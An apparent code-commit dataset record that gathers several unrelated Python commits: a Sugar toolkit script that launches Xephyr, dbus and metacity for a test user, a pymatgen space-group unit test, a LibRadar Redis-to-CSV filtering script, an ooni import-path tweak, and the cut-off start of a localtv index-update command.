samdroid-apps/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,sugarlabs/sugar-toolkit,tchx84/debian-pkg-sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,tchx84/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,tchx84/debian-pkg-sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,tchx84/debian-pkg-sugar-toolkit,samdroid-apps/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,manuq/sugar-toolkit-gtk3,tchx84/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,ceibal-tatu/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,manuq/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,samdroid-apps/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,sugarlabs/sugar-toolkit,puneetgkaur/backup_sugar_sugartoolkit,tchx84/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3
|
Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell
|
#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
if len(sys.argv) < 1:
print "Usage: %s <test user>" % sys.argv[0]
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell<commit_after>
|
#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
if len(sys.argv) < 1:
print "Usage: %s <test user>" % sys.argv[0]
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
if len(sys.argv) < 1:
print "Usage: %s <test user>" % sys.argv[0]
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell<commit_after>#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
if len(sys.argv) < 1:
print "Usage: %s <test user>" % sys.argv[0]
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
|
5f925f837f4ae3ba136f0d6e271848b06467ea8b
|
pymatgen/symmetry/tests/test_spacegroup.py
|
pymatgen/symmetry/tests/test_spacegroup.py
|
#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
Add a unittest for spacegroup. Still very basic.
|
Add a unittest for spacegroup. Still very basic.
|
Python
|
mit
|
yanikou19/pymatgen,yanikou19/pymatgen,sonium0/pymatgen,ctoher/pymatgen,rousseab/pymatgen,Bismarrck/pymatgen,migueldiascosta/pymatgen,rousseab/pymatgen,Bismarrck/pymatgen,migueldiascosta/pymatgen,rousseab/pymatgen,Bismarrck/pymatgen,sonium0/pymatgen,ctoher/pymatgen,ctoher/pymatgen,Dioptas/pymatgen,yanikou19/pymatgen,Bismarrck/pymatgen,sonium0/pymatgen,Bismarrck/pymatgen,Dioptas/pymatgen,migueldiascosta/pymatgen
|
Add a unittest for spacegroup. Still very basic.
|
#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
<commit_before><commit_msg>Add a unittest for spacegroup. Still very basic.<commit_after>
|
#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
Add a unittest for spacegroup. Still very basic.#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
<commit_before><commit_msg>Add a unittest for spacegroup. Still very basic.<commit_after>#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
|
6128e69c9a9313887e66feb6b80e11fb21bf5f10
|
LibRadar/lite_dataset.py
|
LibRadar/lite_dataset.py
|
# -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
Change Rules no,no,no to no,, & update some libs
|
Change Rules no,no,no to no,, & update some libs
|
Python
|
apache-2.0
|
pkumza/LibRadar,pkumza/LibRadar
|
Change Rules no,no,no to no,, & update some libs
|
# -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
<commit_before><commit_msg>Change Rules no,no,no to no,, & update some libs<commit_after>
|
# -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
Change Rules no,no,no to no,, & update some libs# -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
<commit_before><commit_msg>Change Rules no,no,no to no,, & update some libs<commit_after># -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
|
b132993ed859b2c727edd2a6db08b08c011a8b29
|
ooni/lib/__init__.py
|
ooni/lib/__init__.py
|
import sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
Add hack to make import of txtorcon work
|
Add hack to make import of txtorcon work
|
Python
|
bsd-2-clause
|
kdmurray91/ooni-probe,Karthikeyan-kkk/ooni-probe,lordappsec/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,Karthikeyan-kkk/ooni-probe,lordappsec/ooni-probe,juga0/ooni-probe,juga0/ooni-probe,0xPoly/ooni-probe,kdmurray91/ooni-probe,kdmurray91/ooni-probe,hackerberry/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,0xPoly/ooni-probe,juga0/ooni-probe,0xPoly/ooni-probe,juga0/ooni-probe,Karthikeyan-kkk/ooni-probe,hackerberry/ooni-probe,lordappsec/ooni-probe
|
Add hack to make import of txtorcon work
|
import sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
<commit_before><commit_msg>Add hack to make import of txtorcon work<commit_after>
|
import sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
Add hack to make import of txtorcon workimport sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
<commit_before><commit_msg>Add hack to make import of txtorcon work<commit_after>import sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
|
e231c8997d3fedc22dfd356227c080b1d5a9ac94
|
localtv/management/commands/update_index_in_tmpdir.py
|
localtv/management/commands/update_index_in_tmpdir.py
|
# This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
